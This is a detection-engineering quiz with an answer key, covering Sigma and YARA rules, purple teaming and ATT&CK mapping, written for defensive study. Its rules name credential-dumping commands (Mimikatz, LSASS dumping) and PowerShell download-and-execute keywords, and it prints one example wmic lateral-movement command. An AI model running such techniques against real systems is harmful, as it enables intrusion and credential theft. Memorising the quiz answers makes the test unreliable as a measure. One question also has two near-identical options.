
Chapter 4: Detection Engineering - Quiz

← Back to Chapter 4


Instructions

Test your understanding of detection engineering, Sigma/YARA rules, purple teaming, ATT&CK mapping, and Detection-as-Code practices.


Question 1: What is the primary advantage of behavior-based detections over signature-based detections?

A) Behavior-based detections have zero false positives
B) Behavior-based detections are harder to evade and detect technique variants
C) Behavior-based detections are easier to write
D) Behavior-based detections require no tuning

Answer

Correct Answer: B) Behavior-based detections are harder to evade and detect technique variants

Explanation: Behavior-based rules focus on how attackers act rather than specific artifacts:

Signature-based (IOC):

- Detects a specific file hash, domain, or IP
- Evasion: change one byte → new hash (trivial)
- Lifespan: short (attackers constantly rotate IOCs)

Behavior-based (TTP):

- Detects malicious patterns (e.g., PowerShell download-and-execute)
- Evasion: requires changing the fundamental attack technique
- Lifespan: durable across campaigns

Example:

```yaml
# Behavior: PowerShell download & execute (detects technique, not specific malware)
detection:
  selection_download:
    Image|endswith: '\powershell.exe'
    CommandLine|contains: ['Invoke-WebRequest', 'DownloadString']
  selection_execute:
    CommandLine|contains: ['Invoke-Expression', 'IEX']
  condition: selection_download and selection_execute
```

Note: Behavior-based detections DO have false positives (legitimate admin scripts may match) and require tuning.
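For intuition, the selection logic of the rule above can be expressed in plain Python. This is an illustrative sketch, not how a SIEM evaluates Sigma (real Sigma string matching is case-insensitive; this sketch only lowercases the image path):

```python
# Illustrative sketch of the rule's logic against one process-creation event.
# Not a SIEM engine -- just the boolean structure of the Sigma rule above.

def matches_download_execute(image: str, command_line: str) -> bool:
    """selection_download AND selection_execute, as in the rule's condition."""
    selection_download = (
        image.lower().endswith("\\powershell.exe")
        and any(s in command_line for s in ("Invoke-WebRequest", "DownloadString"))
    )
    selection_execute = any(s in command_line for s in ("Invoke-Expression", "IEX"))
    return selection_download and selection_execute

evil = matches_download_execute(
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    "IEX (New-Object Net.WebClient).DownloadString('http://x/a.ps1')",
)
benign = matches_download_execute(r"C:\Windows\notepad.exe", "notepad.exe file.txt")
print(evil, benign)  # True False
```

Changing the payload URL or the downloaded malware does not affect the match; only abandoning the download-and-execute technique would.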

Reference: Chapter 4, Section 4.2 - Detection Types


Question 2: What does the Sigma rule format enable?

A) Automatic penetration testing
B) Vendor-neutral detection rules that convert to multiple SIEM query languages (SPL, KQL, EQL)
C) Real-time threat intelligence sharing
D) Encrypted log storage

Answer

Correct Answer: B) Vendor-neutral detection rules that convert to multiple SIEM query languages

Explanation: Sigma is a universal detection format that solves the portability problem:

Problem: Each SIEM has its own query language:

- Splunk → SPL
- Microsoft Sentinel → KQL
- Elastic → EQL/Lucene
- IBM QRadar → AQL

Sigma Solution: Write rules once in YAML, convert to any SIEM.

Workflow:

1. Write the Sigma rule (YAML)
2. Convert: `sigmac -t splunk rule.yml` → SPL query
3. Convert: `sigmac -t kql rule.yml` → KQL query
4. Deploy to the respective SIEM

Benefits:

- Portability: change SIEM vendors without rewriting detections
- Collaboration: the security community shares Sigma rules (SigmaHQ repository)
- Version control: YAML rules in Git
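As a rough intuition for what such a converter does, here is a toy translation of Sigma-style selections into an SPL-like search string. This is a simplification for illustration only; the real sigmac/pySigma backends handle escaping, field mappings, and full condition logic:

```python
# Toy illustration of what a Sigma-to-SIEM converter does: turn a selection
# of "field|modifier: value" pairs into a Splunk-flavoured query fragment.
# Not the real sigmac/pySigma implementation.

def to_spl(selection: dict) -> str:
    parts = []
    for key, value in selection.items():
        field, _, modifier = key.partition("|")
        values = value if isinstance(value, list) else [value]
        if modifier == "endswith":
            clause = " OR ".join(f'{field}="*{v}"' for v in values)
        elif modifier == "contains":
            clause = " OR ".join(f'{field}="*{v}*"' for v in values)
        else:
            clause = " OR ".join(f'{field}="{v}"' for v in values)
        parts.append(f"({clause})")
    return " ".join(parts)

print(to_spl({
    "Image|endswith": "\\powershell.exe",
    "CommandLine|contains": ["Invoke-WebRequest", "DownloadString"],
}))
# (Image="*\powershell.exe") (CommandLine="*Invoke-WebRequest*" OR CommandLine="*DownloadString*")
```

A KQL backend would emit `endswith`/`contains` operators instead; the Sigma rule itself never changes.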

Reference: Chapter 4, Section 4.3 - Sigma: Universal Detection Format


Question 3: In purple teaming, what is the role of the red team?

A) Monitor SIEM alerts and investigate incidents
B) Safely simulate attack techniques to test detections
C) Write detection rules and tune thresholds
D) Manage SIEM infrastructure

Answer

Correct Answer: B) Safely simulate attack techniques to test detections

Explanation: Purple teaming combines offensive (red) and defensive (blue) collaboration:

Purple Team Workflow:

1. Plan: the red team selects an ATT&CK technique to test (e.g., T1003.001 - LSASS dumping)
2. Execute: the red team safely simulates the technique in a test environment
3. Detect: the blue team monitors SIEM/EDR for alerts
4. Evaluate: Did the detection fire? How long to detect? Any false positives?
5. Improve: tune rules based on results

Roles:

- Red Team: simulates attacks (offensive)
- Blue Team: monitors and validates detections (defensive)
- Purple Team: the collaborative approach (a methodology, not a separate team)

Testing Frameworks:

- Atomic Red Team: small, focused tests mapped to ATT&CK
- Caldera: automated adversary emulation

Reference: Chapter 4, Section 4.5 - Testing Detections: Purple Teaming


Question 4: Which metric measures the percentage of ATT&CK techniques that have at least one detection?

A) Mean Time to Detect (MTTD)
B) False Positive Rate
C) Technique Coverage
D) Alert Volume

Answer

Correct Answer: C) Technique Coverage

Explanation:

Technique Coverage = (Techniques with Detections) / (Total Applicable Techniques) × 100%

Example:

- Applicable techniques for the environment: 150
- Techniques with active detections: 90
- Coverage = 60%

Measurement:

- Map each detection rule to ATT&CK techniques
- Use MITRE ATT&CK Navigator to visualize coverage (heatmaps)
- Identify gaps (red = no detection)

Target:

- >70% for critical tactics (Initial Access, Execution, Credential Access, Lateral Movement, Exfiltration)
- 100% coverage is unrealistic (some techniques may not apply to your environment)

Gap Analysis:

- Focus on high-impact techniques
- Use threat intel: what are adversaries actively using?
- Prioritize gaps in prevention controls (e.g., if there is no EDR on Linux servers, focus on Linux detection rules)
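The coverage arithmetic above is straightforward to automate once each rule is mapped to technique IDs. A minimal sketch (rule names and technique IDs are made up for illustration):

```python
# Compute technique coverage from a rule-to-technique mapping, using the
# same formula as above. All names and IDs here are illustrative examples.

applicable = {"T1003.001", "T1021.002", "T1047", "T1059.001", "T1566.001"}
detections = {
    "mimikatz_detection": ["T1003.001"],
    "psexec_lateral_movement": ["T1021.002"],
    "wmic_remote_exec": ["T1047"],
}

covered = {t for techniques in detections.values() for t in techniques} & applicable
coverage_pct = len(covered) / len(applicable) * 100
gaps = sorted(applicable - covered)

print(f"Coverage: {coverage_pct:.0f}%")  # 3 of 5 techniques -> Coverage: 60%
print("Gaps:", gaps)                     # Gaps: ['T1059.001', 'T1566.001']
```

The `gaps` list is what you would colour red in an ATT&CK Navigator layer.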

Reference: Chapter 4, Section 4.4 - Detection Coverage Mapping


Question 5: What is a key benefit of storing detection rules in version control (Git)?

A) Automatically fixes false positives
B) Tracks changes, enables rollback, and supports collaboration via pull requests
C) Increases SIEM query performance
D) Eliminates the need for testing

Answer

Correct Answer: B) Tracks changes, enables rollback, and supports collaboration via pull requests

Explanation: Detection-as-Code applies software development best practices to detection engineering:

Version Control Benefits:

1. Audit trail: who changed what, when, and why (commit history)
2. Rollback: revert bad rules that cause FP spikes
3. Collaboration: peer review via pull requests
4. Branching: test new detections in a dev branch before production
5. CI/CD: automated validation and deployment

Example Git Workflow:

```
detection-rules/
├── sigma/
│   ├── process_creation/
│   │   ├── mimikatz_detection.yml
│   │   └── powershell_download_execute.yml
├── tests/
│   └── test_mimikatz_detection.py
└── README.md
```

CI Pipeline:

- Validate Sigma syntax on commit
- Convert to the target SIEM format
- Run unit tests against sample data
- Auto-deploy to production if all checks pass
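The "validate Sigma syntax on commit" step can be as simple as checking the fields the Sigma specification requires. A minimal sketch, assuming the rule has already been parsed from YAML (e.g., with PyYAML); a real pipeline would typically use the Sigma toolchain's own validators:

```python
# Minimal CI validation sketch: check a parsed Sigma rule for the fields the
# Sigma spec requires (title, logsource, detection with a condition).
# Illustrative only -- real pipelines use the Sigma toolchain for this.

REQUIRED = ("title", "logsource", "detection")

def validate_rule(rule: dict) -> list[str]:
    errors = [f"missing required field: {f}" for f in REQUIRED if f not in rule]
    detection = rule.get("detection", {})
    if "condition" not in detection:
        errors.append("detection block has no condition")
    return errors

rule = {
    "title": "PsExec Lateral Movement",
    "logsource": {"category": "process_creation", "product": "windows"},
    "detection": {"selection": {"Image|endswith": "\\PsExec.exe"}},  # no condition!
}
print(validate_rule(rule))  # ['detection block has no condition']
```

In CI, a non-empty error list fails the build before the broken rule ever reaches the SIEM.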

Reference: Chapter 4, Section 4.6 - Detection-as-Code


Question 6: A detection rule for PsExec lateral movement would map to which MITRE ATT&CK technique?

A) T1059.001 (PowerShell)
B) T1021.002 (SMB/Windows Admin Shares)
C) T1003.001 (LSASS Memory)
D) T1566.001 (Phishing: Attachment)

Answer

Correct Answer: B) T1021.002 (Remote Services: SMB/Windows Admin Shares)

Explanation: PsExec is a common tool for lateral movement via SMB:

Detection Rule Example:

```yaml
title: PsExec Lateral Movement
detection:
  selection:
    Image|endswith: '\PsExec.exe'
    CommandLine|contains: '\\'  # UNC path (e.g., \\remote-host)
  condition: selection
```

ATT&CK Mapping:

- Technique: T1021.002 (Remote Services: SMB/Windows Admin Shares)
- Tactic: Lateral Movement
- Explanation: PsExec executes commands on remote systems using SMB and Windows admin shares

Other Techniques:

- T1059.001: PowerShell execution
- T1003.001: Credential dumping from LSASS
- T1566.001: Phishing with a malicious attachment

Reference: Chapter 4, Practice Tasks - Task 1


??? question "Question 7: What is a potential source of false positives for this detection rule?"

    ```spl
    index=firewall action=allowed dest_port NOT IN (80, 443, 53)
    | stats count by src_ip, dest_ip, dest_port
    | where count < 5
    ```

    **A)** The rule is perfect and has no false positives
    **B)** Legitimate applications using non-standard ports (VPNs, databases, SSH, RDP)
    **C)** Too many true positives
    **D)** Insufficient RGB lighting

??? success "Answer"
    **Correct Answer: B) Legitimate applications using non-standard ports (VPNs, databases, SSH, RDP)**

    **Explanation:** This rule flags unusual outbound connections (not HTTP/HTTPS/DNS), which can trigger on legitimate traffic:

    **False Positive Sources:**
    - **VPN connections:** Port 1194 (OpenVPN), 4500 (IPsec)
    - **Database connections:** Port 3306 (MySQL), 5432 (PostgreSQL), 1433 (MSSQL)
    - **Remote access:** Port 22 (SSH), 3389 (RDP)
    - **Internal services:** Custom application ports
    - **Cloud services:** Dynamic port ranges

    **Mitigation Strategies:**
    1. **Allowlist known applications:**
       ```spl
       ... | where NOT (dest_port IN (22, 3389, 3306, 1194))
       ```
    2. **Focus on unusual destinations:**
       ```spl
       ... | lookup known_services dest_ip OUTPUT is_known
          | where is_known=false
       ```
    3. **Add asset context:**
       ```spl
       ... | where asset_criticality="high"  # Only alert on critical systems
       ```
    4. **Behavioral baseline:**
       - Alert only on NEW port/destination combinations (not seen in past 30 days)

    **Reference:** [Chapter 4, Practice Tasks - Task 2](../chapters/ch04-siem-datalake-correlation.md)

Question 8: What is the Detection Pyramid, and what does it represent?

A) A hierarchical model showing detection durability (IOCs at top, TTPs at bottom)
B) A hierarchical model showing detection durability (IOCs at top, analytics at base - inverted priority)
C) A SIEM vendor ranking system
D) A physical structure in SOC facilities

Answer

Correct Answer: B) A hierarchical model showing detection durability (IOCs at top, analytics at base)

Explanation: The Detection Pyramid visualizes detection strategy layers:

```
              /\
             /  \        [Tactical]   IOC-based (IP, hash, domain)
            /----\
           /      \      [Behavioral] Technique-based (TTPs)
          /--------\
         /          \    [Analytical] Anomaly, ML
        /____________\
```

Layers:

- Top (Tactical): IOC-based detections
    - Fast to deploy (add a hash to the blocklist)
    - Easy to evade (change one byte)
    - Short lifespan
- Middle (Behavioral): technique-based (TTPs)
    - Harder to evade (requires changing the attack method)
    - More durable across campaigns
- Base (Analytical): anomaly- and pattern-based (ML, UEBA)
    - Most robust (detects novel attacks)
    - Highest effort to develop
    - Adapts to the environment

Best Practice: Build detections at ALL levels for defense in depth.

Reference: Chapter 4, Section 4.1 - Detection Pyramid


Question 9: A YARA rule is designed to detect what?

A) Network traffic patterns exclusively
B) Patterns in files or memory (e.g., malware strings, byte sequences)
C) User authentication failures
D) Cloud configuration drift

Answer

Correct Answer: B) Patterns in files or memory (e.g., malware strings, byte sequences)

Explanation: YARA is a pattern-matching language for identifying malicious files and memory artifacts:

Use Cases:

- File scanning (malware analysis, threat hunting)
- Memory scanning (EDR, forensics)
- Sandbox analysis (automated malware triage)

Example YARA Rule:

```yara
rule Ransomware_Generic_Strings {
    meta:
        description = "Generic ransomware string patterns"
        author = "SOC Detection Team"
    strings:
        $s1 = "Your files have been encrypted" ascii wide
        $s2 = "bitcoin wallet" nocase
        $s3 = ".onion" ascii
        $s4 = "decrypt" fullword nocase
    condition:
        3 of ($s*)  // File must contain 3+ ransomware strings
}
```

Detection Logic:

- Define suspicious strings (keywords, APIs, byte patterns)
- Specify conditions (must match X of Y patterns)
- Scan files/memory with the YARA engine

Integration:

- EDR platforms use YARA for file and memory scanning
- Sandboxes run YARA rules on submitted files
- Threat hunters use YARA for retrospective file scans
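The rule's condition `3 of ($s*)` can be emulated in plain Python to show the counting logic. Real scanning uses the YARA engine (e.g., via yara-python); this sketch also applies case-insensitive matching to every string, unlike the rule's per-string `nocase`/`ascii`/`wide` modifiers:

```python
# Toy re-implementation of the "3 of ($s*)" counting logic from the YARA
# rule above. Illustrative only -- real scanning uses the YARA engine.

RANSOM_STRINGS = [
    b"Your files have been encrypted",
    b"bitcoin wallet",
    b".onion",
    b"decrypt",
]

def matches_ransomware(blob: bytes, threshold: int = 3) -> bool:
    """True if at least `threshold` of the patterns appear in the blob."""
    hits = sum(1 for s in RANSOM_STRINGS if s.lower() in blob.lower())
    return hits >= threshold

sample = (b"ALERT! Your files have been encrypted. Pay to this Bitcoin wallet "
          b"via our .onion site to decrypt them.")
print(matches_ransomware(sample), matches_ransomware(b"hello world"))  # True False
```

Requiring multiple matches ("3 of") is what keeps a single generic word like "decrypt" from firing the rule on benign files.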

Reference: Chapter 4, Section 4.3 - YARA: File and Memory Scanning


Question 10: In the detection lifecycle, what comes AFTER development and BEFORE deployment?

A) Retirement
B) Threat research
C) Testing (purple team validation)
D) Tuning

Answer

Correct Answer: C) Testing (purple team validation)

Explanation: The Detection Lifecycle follows a structured process:

```
[Threat Research] → [Rule Design] → [Development] → [Testing] → [Deployment] → [Tuning] → [Retirement]
        ↑                                                                         |
        └─────────────────────────────────────────────────────────────────────────┘
```

Testing Phase (BEFORE Deployment):

- Validate that the detection fires on known attack samples
- Purple team exercises (simulate the technique, check whether the alert fires)
- Test for false positives (run against benign data)
- Measure performance (query speed, resource usage)
- Document test results

Why Testing Matters:

- Untested rules may fail silently in production
- False positive testing prevents alert fatigue
- Performance testing prevents SIEM overload

Tools:

- Atomic Red Team: simulated attack tests
- Caldera: automated adversary emulation
- Sample data sets: benign user activity for FP testing

Reference: Chapter 4, Section 4.1 - The Detection Lifecycle


Question 11: What is anomaly-based detection, and what is a key limitation?

A) Detects known malware hashes; limitation is it only works on Windows
B) Detects outliers from baseline behavior; limitation is it requires a training period and can be evaded by gradual changes
C) Detects only network traffic; limitation is it cannot see endpoints
D) Detects specific IP addresses; limitation is IPs change frequently

Answer

Correct Answer: B) Detects outliers from baseline behavior; limitation is it requires a training period and can be evaded by gradual changes

Explanation:

Anomaly-Based Detection:

- Establishes a baseline of normal behavior
- Flags statistical outliers (activity exceeds baseline + X standard deviations)

Example:

```spl
index=file_access
| bin _time span=1h
| stats count by user, _time
| eventstats avg(count) as avg_count, stdev(count) as stdev_count by user
| eval threshold = avg_count + (3 * stdev_count)
| where count > threshold
```

Alert: the user's hourly file-access count exceeded their baseline by more than three standard deviations.
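The threshold arithmetic from the query above, reproduced in plain Python (`statistics.stdev` is the sample standard deviation, matching SPL's `stdev`; the hourly counts are illustrative):

```python
# Same avg + 3*stdev outlier test as the SPL query above, for one user.
import statistics

baseline_hourly_counts = [10, 12, 9, 11, 10, 13, 8, 11]  # illustrative history

avg = statistics.mean(baseline_hourly_counts)        # 10.5
stdev = statistics.stdev(baseline_hourly_counts)     # sample standard deviation
threshold = avg + 3 * stdev

def is_anomalous(count: int) -> bool:
    return count > threshold

print(round(threshold, 1), is_anomalous(12), is_anomalous(40))  # 15.3 False True
```

Note how an attacker who slowly drifts the counts upward also drifts the baseline, which is exactly the "slow evasion" limitation discussed below.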

Advantages:

- Detects novel attacks without signatures
- Adapts to the environment
- Good for insider threats and compromised accounts

Limitations:

1. Training period required: needs 30-90 days to establish a baseline
2. Slow evasion: attackers can gradually increase activity to stay within the baseline
3. False positives: legitimate business changes (mergers, role changes) trigger alerts
4. Concept drift: baselines become stale as the business evolves

Mitigation:

- Combine with signature- and behavior-based detections
- Update baselines regularly
- Tune sensitivity thresholds

Reference: Chapter 4, Section 4.2 - 3. Anomaly-based Detection


Question 12: An Atomic Red Team test for T1003.001 (LSASS dumping) is executed, but no SIEM alert fires. What should the blue team do?

A) Assume the test failed and ignore it
B) Investigate why the detection failed: verify telemetry exists, check detection logic, and improve the rule
C) Immediately escalate to executives
D) Delete all detections

Answer

Correct Answer: B) Investigate why the detection failed and improve the rule

Explanation: This is the purpose of purple teaming - identifying and closing detection gaps.

Investigation Steps:

1. Verify telemetry:
    - Did the endpoint send logs to the SIEM? Check: `index=endpoint host="test-system" earliest=-1h`
    - If no logs: fix log forwarding
2. Check detection logic:
    - Review the detection rule query
    - Is the rule looking for the right event types (process accessing LSASS, dump file creation)?
    - Test the query manually against known-good test data
3. Validate test execution:
    - Did Atomic Red Team actually execute the technique?
    - Check the test system locally for artifacts
4. Improve the detection:
    - Add additional detection methods (EDR behavioral, file creation monitoring)
    - Expand telemetry coverage (enable Sysmon if not present)
    - Document the gap and remediation in the test log

Test Documentation:

- Test ID: DET-2026-034
- Technique: T1003.001 (LSASS Memory Dumping)
- Result: ❌ Detection did not fire
- Root Cause: the SIEM rule only checked for "mimikatz.exe" in the process name, but the Atomic test used "procdump.exe"
- Remediation: updated the rule to detect any process accessing LSASS memory (not just mimikatz)
- Retest: ✅ Detection now fires correctly
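The remediation above (match on what touches LSASS, not on a tool name) can be sketched against Sysmon-style ProcessAccess telemetry. Field names are modelled on Sysmon Event ID 10 and are illustrative, not a production rule:

```python
# Sketch of the improved, tool-name-agnostic detection: alert on ANY process
# opening LSASS memory (Sysmon Event ID 10 style events; fields illustrative).

def lsass_access_alert(event: dict) -> bool:
    return (
        event.get("EventID") == 10
        and event.get("TargetImage", "").lower().endswith("\\lsass.exe")
    )

procdump = {"EventID": 10, "SourceImage": r"C:\tools\procdump.exe",
            "TargetImage": r"C:\Windows\System32\lsass.exe"}
mimikatz = {"EventID": 10, "SourceImage": r"C:\tmp\mimikatz.exe",
            "TargetImage": r"C:\Windows\System32\lsass.exe"}
benign   = {"EventID": 10, "SourceImage": r"C:\Windows\explorer.exe",
            "TargetImage": r"C:\Windows\System32\svchost.exe"}

print([lsass_access_alert(e) for e in (procdump, mimikatz, benign)])
# [True, True, False] -- both dumping tools caught, regardless of name
```

In practice such a rule needs an allowlist (AV engines and some EDR components legitimately open LSASS), which is tuning work the purple team exercise would surface.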

Reference: Chapter 4, Section 4.5 - Purple Teaming


Question 13: What is the purpose of the `falsepositives` field in a Sigma rule?

A) To automatically delete false positives
B) To document known benign scenarios that may trigger the rule, helping analysts tune
C) To disable the rule entirely
D) To encrypt the rule

Answer

Correct Answer: B) To document known benign scenarios that may trigger the rule

Explanation: The `falsepositives` field provides critical context for analysts and detection engineers:

Example Sigma Rule:

```yaml
title: Mimikatz Credential Dumping
detection:
  selection_img:
    Image|endswith: '\mimikatz.exe'
  selection_cli:
    CommandLine|contains: ['sekurlsa::logonpasswords', 'lsadump::sam']
  condition: selection_img or selection_cli
falsepositives:
  - Legitimate penetration testing (whitelist known test systems)
  - Security training environments
level: critical
```

Purpose:

- For analysts: understand when to close as an FP vs. escalate
- For engineers: guidance on tuning (e.g., "add an allowlist for IP 10.0.5.50")
- For documentation: explain expected benign triggers

Best Practice:

- Be specific: "Scheduled vulnerability scans from 10.0.1.100" (not just "scans")
- Update the field as new FP sources are discovered
- Include remediation guidance where possible

Reference: Chapter 4, Section 4.3 - Sigma Rule Example


Question 14: Which statement about signature-based detections is TRUE?

A) They are completely obsolete and should never be used
B) They provide high precision for known threats but are trivial to evade
C) They detect all zero-day attacks
D) They require machine learning

Answer

Correct Answer: B) They provide high precision for known threats but are trivial to evade

Explanation:

Signature-Based Detection: matches specific indicators (file hash, domain, IP, regex pattern).

Pros:

- High precision: a known malware hash means a definite detection
- Fast performance: simple lookups
- Easy to understand: "block this IP" is straightforward

Cons:

- Trivial evasion: change one byte → new hash (polymorphic malware)
- Requires constant updates: new malware means new signatures are needed
- Misses zero-days: unknown threats have no signatures

Modern Approach:

- Use signatures as part of defense in depth (not the only layer)
- Combine with behavior- and anomaly-based detections
- Automate signature updates (threat intel feeds)

Example:

```spl
index=endpoint file_hash="5d41402abc4b2a76b9719d911017c592"
| table _time, host, file_path, process_name
```

Misconception Debunked: Signatures are NOT obsolete - they remain valuable for known threats. But relying ONLY on signatures is insufficient.
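Signature matching is essentially a set lookup, which makes both its precision and its fragility easy to demonstrate (hashes are computed inline here, not real threat indicators):

```python
# Signature matching as a set lookup: exact, fast, and brittle.
# Hashes are computed from placeholder bytes, not real malware indicators.
import hashlib

known_bad = {hashlib.sha256(b"malware-v1").hexdigest()}

def is_known_bad(file_bytes: bytes) -> bool:
    return hashlib.sha256(file_bytes).hexdigest() in known_bad

print(is_known_bad(b"malware-v1"))   # True  -- exact match on the known sample
print(is_known_bad(b"malware-v1 ")) # False -- one appended byte, signature missed
```

That one-byte miss is why signature layers are paired with the behavioral and anomaly layers covered earlier.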

Reference: Chapter 4, Section 4.2 - 1. Signature-based Detection


??? question "Question 15: A detection engineer wants to detect attackers using wmic.exe for lateral movement. Which fields should the Sigma rule check?"

    ```yaml
    title: WMIC Lateral Movement
    detection:
      selection:
        Image|endswith: '\wmic.exe'
        CommandLine|contains: [???, ???]
    ```

    **A)** `'/node:'` and `'process call create'`
    **B)** `'http://'` and `'https://'`
    **C)** `'mimikatz'` and `'sekurlsa'`
    **D)** `'GET'` and `'POST'`

??? success "Answer"
    **Correct Answer: A) `'/node:'` and `'process call create'`**

    **Explanation:** WMIC (Windows Management Instrumentation Command-line) is commonly abused for lateral movement:

    **Attack Pattern:**
    ```cmd
    wmic /node:REMOTE-PC process call create "cmd.exe /c malicious.exe"
    ```

    **Detection Logic:**
    - **`/node:`** → Targeting remote system
    - **`process call create`** → Executing command remotely

    **Complete Sigma Rule:**
    ```yaml
    title: WMIC Lateral Movement
    id: a1b2c3d4-e5f6-7890-1234-567890abcdef
    status: experimental
    description: Detects use of WMIC for remote command execution
    references:
      - https://attack.mitre.org/techniques/T1047/
    tags:
      - attack.execution
      - attack.lateral_movement
      - attack.t1047
    logsource:
      category: process_creation
      product: windows
    detection:
      selection:
        Image|endswith: '\wmic.exe'
        CommandLine|contains:
          - '/node:'
          - 'process call create'
      condition: selection
    falsepositives:
      - Legitimate remote administration (whitelist admin workstations)
      - Management tools using WMIC
    level: high
    ```

    **ATT&CK Mapping:** T1047 (Windows Management Instrumentation)

    **Reference:** [Chapter 4, Practice Tasks - Task 3](../chapters/ch04-siem-datalake-correlation.md)

Score Interpretation

- 13-15 correct: Excellent! You're ready to build and test detection rules.
- 10-12 correct: Good understanding. Practice writing Sigma/YARA rules hands-on.
- 7-9 correct: Solid foundation. Focus on ATT&CK mapping and purple teaming concepts.
- Below 7: Review Chapter 4, especially detection types and the detection lifecycle.

← Back to Chapter 4 | Next Quiz: Chapter 5 →